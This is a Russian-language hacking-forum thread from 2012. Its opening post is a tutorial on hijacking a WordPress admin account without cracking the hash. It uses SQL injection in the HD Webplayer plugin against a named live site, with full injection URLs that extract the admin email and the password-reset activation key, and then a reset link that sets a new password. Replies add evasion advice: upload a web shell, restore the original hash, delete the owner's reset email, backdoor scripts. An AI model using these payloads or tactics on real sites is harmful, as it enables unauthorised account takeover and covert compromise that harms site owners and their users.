Авторские статьи Получаем доступ в админку Wordpress без расшифровки хэша

Discussion in 'Статьи' started by MaxFast, 7 Nov 2012.

  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Приветствую. Решил написать небольшую заметку.
    Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
    Но я понял как входить в панель без ожидания расшифровки хэша.

    Покажу на примере.
    У нас есть блог, где мы уже вывели данные из таблицы wp_users.
    Торопится выводить пароль не стоит, выведем e-mail администратора:

    Code:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
    И результат запроса:

    Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

    Вводим e-mail администратора который мы получили выше, и отправляем письмо.

    Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
    Делаем такой запрос:

    Code:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
    И в результате мы получаем активационный код:

    Теперь идем на страницу сброса пароля (При этом заполнив параметры):

    Code:
    www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
    И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

    Далее привычная авторизация.

    Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().
    Способ работает не везде.

    (с) MaxFast
     
    #1 MaxFast, 7 Nov 2012
    Last edited: 5 Jan 2013
  2. cLauZ

    cLauZ Member

    Joined:
    22 Oct 2009
    Messages:
    328
    Likes Received:
    27
    Reputations:
    5
    Аммм...сорри ТС а для какой версии WP?

    И как получить хэш для версии 3.4.1
     
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Ну я тестировал на 3.2.1.
    Все данные я вытянул с помощью SQL Injection в плагине.
     
  4. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..
     
  5. martmm

    martmm New Member

    Joined:
    29 Jan 2010
    Messages:
    80
    Likes Received:
    4
    Reputations:
    4
    ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?
     
  6. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Пароль знать не нужно, да.
    Главное узнать e-mail, и активационный код.
     
    1 person likes this.
  7. Alexey_S

    Alexey_S New Member

    Joined:
    10 Aug 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    если шел зальешь, базу можно будет вернуть в исходное состояние.
     
  8. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    181
    Likes Received:
    103
    Reputations:
    18
    И удалить письмо с восстановлением пароля с почты владельца?
     
    1 person likes this.
  9. Alexey_S

    Alexey_S New Member

    Joined:
    10 Aug 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Он может его и не прочитать, как повезет.Но если оставить как написано в первом посте, факт обнаружения выше.
     
  10. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит)
    А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++
     
  11. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Кстати а как с джумлой обстоят дела?Там же тоже должно катить.
     
  12. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Данный способ подходит для большого числа CMS и движков, за исключением тех, которые высылают на e-mail сам пароль.
     
    _________________________
  13. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    Отчего же? заливаем шелл, в бд меняем наш хеш админа на старый
    Ну кто то узнал мейл и пытался восстановить пароль. Что такого то? Там же вряд ли приходит новый пасс
     
  14. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Плагин HD Webplayer далеко не везде установлен. Но за способ +.
     
  15. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Дело не в нем. Каждая БД вордпресса хранит одни и те же поля. Просто этот блог самый первый с SQLi попался.
     
  16. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Что поля одинаковые это понятно, но дырявый скрипт находится в этом плагине. Так? Ты ведь не можешь провести injaction через другой скрипт.
     
  17. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Какая разница как именно и через что проводить инъекцию? У Wordpress'a много уязвимых мест.
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    да ты гений прям. тут описывается не инжект в плагины, а реализация входа через "окно" в админку WP. Как ты будешь проводить injEction - дело десятое.
     
  19. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Но ведь такой метод можно реализовать и на другой cms не обязательно wp, а автор описывает именно как баг wp. А без инжекта ты воспользоваться этим способом не сможешь в принципе, так что он далеко не последнее дело.
     
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Суть этой статьи в том, чтобы показать как обойти расшифровку пароля на Wordpress.
    Тут совершенно неважно какая бага, тут только прочитать данные из поля нужно, и все.